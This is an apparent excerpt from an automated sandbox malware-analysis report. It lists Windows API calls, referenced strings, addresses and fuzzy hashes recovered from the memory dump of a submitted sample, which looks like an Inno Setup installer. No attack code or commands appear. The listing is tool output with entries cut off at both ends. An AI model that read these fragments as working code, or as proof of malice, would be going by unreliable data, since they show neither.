                                                                                                            • Instruction Fuzzy Hash: C941F4B2E003409FDB10CF68DD8921A77A4F7A8328F15417BD844A77E1D3B89851CB89
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                                                            • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                                                            Strings
                                                                                                            • Will not restart Windows automatically., xrefs: 00481AA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveForeground
                                                                                                            • String ID: Will not restart Windows automatically.
                                                                                                            • API String ID: 307657957-4169339592
                                                                                                            • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                                            • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                                                            • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                                            • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00424975
                                                                                                            • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CursorMessageWait
                                                                                                            • String ID: +qI
                                                                                                            • API String ID: 4021538199-4068327824
                                                                                                            • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                                            • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                                            • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                                            • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                                            Strings
                                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                            • API String ID: 0-1974262853
                                                                                                            • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                                            • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                                                            • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                                            • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                                                            • %s\%s_is1, xrefs: 004779B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                            • API String ID: 47109696-1598650737
                                                                                                            • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                                            • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                                                            • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                                            • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteMessageSendShell
                                                                                                            • String ID: open
                                                                                                            • API String ID: 812272486-2758837156
                                                                                                            • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                                            • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                                                            • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                                            • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                            • String ID: )
                                                                                                            • API String ID: 2227675388-1084416617
                                                                                                            • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                                            • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                                                            • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                                            • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                                            • API String ID: 2353593579-4169826103
                                                                                                            • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                                            • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                                                            • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                                            • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                                            • API String ID: 3952431833-1023667238
                                                                                                            • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                                            • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                                                            • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                                            • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                                                            • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                                              • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                                            • String ID: D
                                                                                                            • API String ID: 3798668922-2746444292
                                                                                                            • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                                            • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                                                            • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                                            • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                                                            APIs
                                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$EnumQuery
                                                                                                            • String ID: Inno Setup: No Icons
                                                                                                            • API String ID: 1576479698-2016326496
                                                                                                            • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                                            • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                                                            • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                                            • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(73AF0000,0047FFE2), ref: 0047BB46
                                                                                                              • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                                              • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                                                            Strings
                                                                                                            • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                                            • API String ID: 1717587489-3199836293
                                                                                                            • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                                            • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                                                            • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                                            • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                            • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteFileHandleMutexRelease
                                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                                            • API String ID: 3841931355-3392794427
                                                                                                            • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                                            • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                                                            • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                                            • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                                                            APIs
                                                                                                            • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                                                            • GetFocus.USER32 ref: 00421D69
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Focus
                                                                                                            • String ID: +qI
                                                                                                            • API String ID: 2734777837-4068327824
                                                                                                            • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                            • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                                            • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                            • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                                                            • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileSystem
                                                                                                            • String ID: $pI
                                                                                                            • API String ID: 2086374402-3761944556
                                                                                                            • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                                            • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                                            • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                                            • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                                            • GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CommandHandleLineModule
                                                                                                            • String ID: H6u
                                                                                                            • API String ID: 2123368496-683348396
                                                                                                            • Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                            • Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
                                                                                                            • Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                            • Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF
                                                                                                            APIs
                                                                                                            Memory Dump Source
